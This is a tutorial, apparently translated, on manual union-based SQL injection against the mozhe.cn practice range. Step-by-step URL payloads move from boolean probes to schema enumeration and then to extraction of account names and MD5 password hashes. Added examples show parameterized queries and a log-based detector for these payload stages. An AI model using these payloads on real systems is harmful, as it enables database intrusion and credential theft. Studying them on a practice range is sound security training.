Introduction to SQL Injection

SQL injection occurs when an application (the code may be ASP, ASPX, PHP, JSP, etc.) takes variable content submitted by the user's browser and, without filtering it, passes it directly into a database query. As a result, other content in the database (such as management accounts and passwords) is queried and returned to the page. First, take a look at a short story from Mohist College:

In one town, the bank safe serves as a common area for residents to store valuables. In order to prevent them from taking other people’s belongings by mistake, the bank has a rule that each person can only take one key to open his or her own safe at a time. There is a security guard at the security gate of the bank. The security guard is responsible for checking that people who enter the safe are carrying only one key at a time.

There are many banks in this town, and there is a man named “passer-by A”. He went to bank A to collect his goods. The security guard at bank A was dutiful and checked “passer-by A” up and down, inside and out, N times to make sure he carried only his own key before letting him in. Later, “passer-by A” went to bank B. He found that the security guard at bank B was the president's brother-in-law; the post was only a decoration, he never did any work, and nobody checked who entered the safe. So “passer-by A” took both his own key and his wife's key and successfully collected the items. Next he carried a screwdriver through the security gate, used it to open the cabinet of the president's brother-in-law, and took away his goods. He then found that the president's cabinet was welded with steel plates and the screwdriver could not open it, so he brought a cutting machine through the security gate, spent a lot of effort cutting the cabinet open, and took everything in the president's cabinet.

Discovering that he could “get rich”, the man loitered from bank to bank all day, looking for lax security checks to pick up other people’s belongings. The security cameras of every bank recorded his comings and goings. Finally, one day, a bank told the police, who retrieved the video content of the camera and arrested the “passer-by A”. According to relevant laws and regulations, “passer-by A” suspected of unauthorized acquisition (invasion) of other people’s goods, was sentenced to prison.

Let’s assign each part of the story a role:

◆ Town == Internet

◆ Bank == business system (website)

◆ Security gate == application (code)

◆ Security guard == filtering of unsafe code (such as SQL injection, XSS and other dangerous code)

◆ Items in the safe == data stored in the database, which may contain account passwords and other sensitive data

◆ Brother-in-law's safe items == management rights of the business system (website)

◆ President's safe items == server (host) permissions

◆ “Passer-by A” == the person who operates the browser

◆ “Passer-by A” key == submitting normal variable content

◆ “Passer-by A” wife's key == submitting SQL injection test statements

◆ Screwdriver == submitting other SQL injection statements

◆ Cutting machine == WebShell or privilege-escalation commands

◆ Camera == all kinds of logging

◆ Police == the real police

◆ Laws and regulations == Criminal Law, Cyber Security Law

If “passer-by A” were a security company hired to protect the bank, he would know best where the bank is most vulnerable and could put protection in place. If many townspeople come to the bank to collect items, build a few more doors (load balancing). Add several layers of security to the bank's security gate (firewalls, WAF, IPS, IDS and other security equipment). Replace the president's brother-in-law (fix the vulnerability), and check every day that the security guards are actually working (regular inspection). There are other protections as well, such as putting the safe and the security gate in separate rooms (the database is separated from the application) and turning on all cameras (logging is enabled). That is as far as the story goes; how a real business system is hardened has to be decided according to the business scenario.

Online range address

This is the simplest and most basic SQL injection exercise. It requires an understanding of basic MySQL syntax and database structure; please study the MySQL basics on your own.

MySQL Manual injection firing range (environment described in this article) : www.mozhe.cn/bug/detail/…

Manual SQL Injection firing range: www.mozhe.cn/Special/SQL…

Manual SQL injection details

In manual SQL injection, the statement the database executes is built as follows: the page submits the request to the server application, the application obtains the id value and splices it into the query statement, the query runs in the database, and the application parses the result and returns it on the page. (Please replace mozhe.cn with the corresponding address of the range.)
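The splicing described above, next to a hardened version, as an added example that is not part of the original article. It uses an in-memory SQLite database instead of the range's MySQL; the function names, the member table and all rows are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the range database (constructed rows, SQLite not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, contents TEXT, times TEXT);
        INSERT INTO news VALUES (1, 'Notice', 'Maintenance tonight', '2018-01-01');
        CREATE TABLE member (id INTEGER, name TEXT, password TEXT, status INTEGER);
        INSERT INTO member VALUES (1, 'alice', 'constructed-hash', 0);
    """)
    return db

def news_spliced(db, raw_id):
    """Vulnerable pattern: the id value becomes part of the SQL text itself."""
    return db.execute("SELECT * FROM news WHERE id=" + raw_id).fetchall()

def news_bound(db, raw_id):
    """Hardened pattern: reject non-numeric ids, then bind the value as a parameter."""
    # Validation keeps malformed ids from reaching the database at all.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a decimal integer")
    # The placeholder sends the value separately from the SQL text.
    return db.execute("SELECT * FROM news WHERE id=?", (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    samples = ("1", "1 and 1=2",
               "1 and 1=2 union select 1,name,password,4 from member")
    for raw in samples:
        print("spliced", repr(raw), "->", news_spliced(db, raw))
        try:
            print("bound  ", repr(raw), "->", news_bound(db, raw))
        except ValueError as err:
            print("bound  ", repr(raw), "-> rejected:", err)
```

With the spliced query, the submitted text changes which rows and even which table the page displays; with the bound query, only a plain integer ever reaches the database.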

Start range environment:



Step 1:

Page submission: http://mozhe.cn/new_list.php?id=1

Database execution statement: select * from news where id=1

Page return description: The displayed information is normal

Analysis: Browse the page normally and find a place that takes a parameter, such as id.

Step 2:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=1

Database execution statement: select * from news where id=1 and 1=1

Page return description: The displayed information is normal

Analysis: Test with an SQL condition appended. 1=1 is always true, so the result is unchanged.

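Step 3:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2

Database execution statement: select * from news where id=1 and 1=2

Page return description: The returned content is empty

Analysis: 1=2 is always false, so the query returns no rows and the page is empty.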

Step 4:

Page submission: http://mozhe.cn/new_list.php?id=1 order by 1

Database execution statement: select * from news where id=1 order by 1

Page return description: The displayed information is normal

Analysis: order by N sorts by the Nth column of the SQL statement. A normal display indicates that there is at least one column.

Step 5:

Page submission: http://mozhe.cn/new_list.php?id=1 order by 2

Database execution statement: select * from news where id=1 order by 2

Page return description: The displayed information is normal

Analysis: order by N sorts by the Nth column of the SQL statement. A normal display indicates that there are at least two columns.

Step 6:

Page submission: http://mozhe.cn/new_list.php?id=1 order by 3

Database execution statement: select * from news where id=1 order by 3

Page return description: The displayed information is normal

Analysis: order by N sorts by the Nth column of the SQL statement. A normal display indicates that there are at least three columns.

Step 7:

Page submission: http://mozhe.cn/new_list.php?id=1 order by 4

Database execution statement: select * from news where id=1 order by 4

Page return description: The displayed information is normal

Analysis: order by N sorts by the Nth column of the SQL statement. A normal display indicates that there are at least four columns.

Step 8:

Page submission: http://mozhe.cn/new_list.php?id=1 order by 5

Database execution statement: select * from news where id=1 order by 5

Page return description: The returned content is empty

Analysis: The empty result for order by 5 indicates that the number of columns in the SQL statement is less than five.

Step 9:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,2,3,4

Database execution statement: select * from news where id=1 and 1=2 union select 1,2,3,4

Page return description: The original title position displays 2, and the content position displays 3

Analysis: and 1=2 makes the original query return nothing, so the page shows the row from union select 1,2,3,4. From this it can be guessed that the application's statement is similar to select id,title,contents,times from news where id=1, where title is displayed in the second position and contents in the third. For an introduction to the syntax of union, please do your own homework.

Step 10:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,database(),version(),4

Database execution statement: select * from news where id=1 and 1=2 union select 1,database(),version(),4

Page return description: The original title position displays mozhe_Discuz_StormGroup, and the content position displays 5.7.22-0ubuntu0.16.04.1

Analysis: database() queries the name of the current database (syntax: select database();); there may be more than one database on a server. version() queries the current database version (syntax: select version();). mozhe_Discuz_StormGroup is the current database, and 5.7.22-0ubuntu0.16.04.1 is the database version and the operating system version.

Step 11:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 0,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 0,1

Page return description: The original title position displays information_schema, and the content position displays 3

Analysis: The database information_schema, the table SCHEMATA, and the column SCHEMA_NAME are involved here. information_schema is a MySQL system database that records most of the information we need about the current database system, such as character sets, permissions, database entity object information, external check constraints, partitioning, compressed tables, table information, index information, parameters, optimizations, locks, and transactions. In short, information_schema contains the database names, table names, column names, and other information for the MySQL server. limit 0,1 means starting from row 0, take 1 row; information_schema is the first database name.

Step 12:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 1,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 1,1

Page return description: The original title position displays mozhe_Discuz_StormGroup, and the content position displays 3

Analysis: limit 1,1 means starting from row 1, take 1 row; mozhe_Discuz_StormGroup is the second database name.

Step 13:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 2,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 2,1

Page return description: The original title position displays mysql, and the content position displays 3

Analysis: limit 2,1 means starting from row 2, take 1 row; mysql is the third database name.

Step 14:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 3,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 3,1

Page return description: The original title position displays performance_schema, and the content position displays 3

Analysis: limit 3,1 means starting from row 3, take 1 row; performance_schema is the fourth database name.

Step 15:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 4,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 4,1

Page return description: The original title position displays sys, and the content position displays 3

Analysis: limit 4,1 means starting from row 4, take 1 row; sys is the fifth database name.

Step 16:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 5,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 5,1

Page return description: The returned content is empty

Analysis: There are only five databases (information_schema, mozhe_Discuz_StormGroup, mysql, performance_schema, sys).

Step 17:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1

Page return description: The original title position displays StormGroup_member, and the content position displays 3

Analysis: This queries the table names in the database mozhe_Discuz_StormGroup. With limit 0,1, the first table name is StormGroup_member.

Step 18:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 1,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 1,1

Page return description: The original title position displays notice, and the content position displays 3

Analysis: This queries the table names in the database mozhe_Discuz_StormGroup. With limit 1,1, the second table name is notice.

Step 19:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 2,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 2,1

Page return description: The returned content is empty

Analysis: mozhe_Discuz_StormGroup has only two tables, StormGroup_member and notice.

Step 20:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 0,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 0,1

Page return description: The original title position displays id, and the content position displays int(11)

Analysis: This queries the column names and types of the table StormGroup_member in the database mozhe_Discuz_StormGroup. The first column is named id and its type is int(11).

Step 21:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 1,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 1,1

Page return description: The original title position displays name, and the content position displays varchar(20)

Analysis: The second column of the table StormGroup_member is named name and its type is varchar(20).

Step 22:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 2,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 2,1

Page return description: The original title position displays password, and the content position displays varchar(255)

Analysis: The third column of the table StormGroup_member is named password and its type is varchar(255).

Step 23:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 3,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 3,1

Page return description: The original title position displays status, and the content position displays int(11)

Analysis: The fourth column of the table StormGroup_member is named status and its type is int(11).

Step 24:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 4,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 4,1

Page return description: The returned content is empty

Analysis: The table StormGroup_member in mozhe_Discuz_StormGroup has only 4 columns, named id, name, password, and status.

Step 25:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,count(*),3,4 from mozhe_discuz_stormgroup.stormgroup_member

Database execution statement: select * from news where id=1 and 1=2 union select 1,count(*),3,4 from mozhe_discuz_stormgroup.stormgroup_member

Page return description: The original title position displays 2, and the content position displays 3

Analysis: count(*) queries the number of rows in the table StormGroup_member of the database mozhe_Discuz_StormGroup; there are 2 rows.

Step 26:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

Page return description: The original title position displays mozhe-356f589a7df439f6f744ff19bb8092c0-0, and the content position displays 3

Analysis: This queries the name, password, and status columns of the table StormGroup_member in the database mozhe_Discuz_StormGroup. CONCAT splices the values together so that they are all shown in one place. In the first record, the account name is mozhe, the password is 356f589a7df439f6f744ff19bb8092c0 (an MD5-hashed password whose plaintext can be recovered), and the account status is 0.

Step 27:

Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1

Database execution statement: select * from news where id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1

Page return description: The original title position displays mozhe-6380305ffa6520047acfe95d29ae707b-1, and the content position displays 3

Analysis: This queries the name, password, and status columns of the table StormGroup_member in the database mozhe_Discuz_StormGroup. CONCAT splices the values together so that they are all shown in one place. In this record, the account name is mozhe, the password is 6380305ffa6520047acfe95d29ae707b (an MD5-hashed password whose plaintext can be recovered), and the account status is 1.

Once the plaintext of the final MD5 password is recovered, you have the background login password.

In this walkthrough, none of the SQL injection statements needed any escaping or comments. In practice, the injection point may process the input: quotes, parentheses and so on must be closed first, strings may need to be written in hexadecimal, redundant statements commented out, and so on.
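The requests in the steps above leave a recognizable trail in the web server's access log (the "camera" in the story). The following is an added example, not part of the original article, that URL-decodes each query parameter, labels the stages used in this walkthrough, and reports clients that pass through several of them. The log lines, IP addresses, rule names and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Stages of the walkthrough, in the order the steps use them.
RULES = [
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("column-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not from a real server.
T = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.5 - - {T} "GET /new_list.php?id=1 HTTP/1.1" 200 512',
    f'203.0.113.5 - - {T} "GET /new_list.php?id=1%20and%201=1 HTTP/1.1" 200 512',
    f'203.0.113.5 - - {T} "GET /new_list.php?id=1+order+by+5 HTTP/1.1" 200 90',
    f'203.0.113.5 - - {T} "GET /new_list.php?id=1%20and%201=2%20union%20select'
    f'%201,2,3,4 HTTP/1.1" 200 300',
    f'203.0.113.5 - - {T} "GET /new_list.php?id=1%20and%201=2%20union%20select'
    f'%201,SCHEMA_NAME,3,4%20from%20information_schema.schemata%20limit%200,1'
    f' HTTP/1.1" 200 300',
    f'198.51.100.7 - - {T} "GET /new_list.php?id=2 HTTP/1.1" 200 512',
    f'198.51.100.7 - - {T} "GET /search.php?q=rock+and+roll HTTP/1.1" 200 700',
]

def classify(value):
    """Return the stage labels that match one decoded parameter value."""
    text = re.sub(r"\s+", " ", value)
    return [name for name, rx in RULES if rx.search(text)]

def scan(lines):
    """Yield (client, parameter, stages) for every request that matches a rule."""
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qsl undoes %xx and '+' encoding before the rules are applied.
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            stages = classify(value)
            if stages:
                findings.append((client, key, stages))
    return findings

def suspects(lines, min_stages=2):
    """Clients whose requests cover at least min_stages distinct stages."""
    seen = defaultdict(set)
    for client, _key, stages in scan(lines):
        seen[client].update(stages)
    order = [name for name, _ in RULES]
    return {c: [s for s in order if s in got]
            for c, got in seen.items() if len(got) >= min_stages}
```

A single matching request can be noise; the progression from probe to column count to union select to schema enumeration from one client is the pattern worth alerting on.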